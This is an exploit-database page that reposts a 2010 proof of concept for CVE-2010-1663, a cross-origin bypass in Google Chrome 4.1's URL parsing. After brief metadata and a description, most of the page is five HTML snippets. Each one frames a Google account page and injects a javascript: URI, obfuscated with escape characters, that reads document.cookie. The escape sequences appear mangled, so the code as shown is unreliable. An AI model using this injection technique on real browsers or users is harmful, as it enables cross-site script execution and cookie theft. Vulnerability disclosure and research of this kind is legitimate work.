Advertisement






Google Chrome 4.1.249.1059 cross origin bypass vulnerability in Google URL

CVE Category Price Severity
CVE-2010-1663 CWE-200 $5,000 High
Author Risk Exploitation Type Date
Unknown High Remote 2010-05-21
CPE
cpe:cpe:/a:google:chrome:4.1.249.1059
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0 0

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010050119

Below is a copy:

#Google Chrome 4.1.249.1059 Cross Origin Bypass in Google URL (GURL)
#
#CVE-ID: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1663
#
#Author: Jordi Chancel
#
#Software Link: http://googlechromereleases.blogspot.com/2010/04/stable-update-bug-and-security-fixes.html
#
#Description: {
#The Google URL Parsing Library (aka google-url or GURL) in Google Chrome 
#before 4.1.249.1064 allows remote attackers to bypass the Same Origin Policy 
#via CHARACTER TABULATION or others escape characters inside javascript: protocol string. }
#
#Some PoC : 

<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascru0009ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascrx09ipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascrnipt:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascrript:alert(document.cookie)','test')" >Inject JavaScript</a>
----
<iframe name="test" src="https://www.google.com/accounts/ManageAccount?hl=fr"></iframe> 
<a href="#" value="test" onclick="window.open('javascrtipt:alert(document.cookie)','test')" >Inject JavaScript</a>

Greetz : Xylitol , Eddy Bordi , 599eme Man , Gnouf , CTZ .




Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum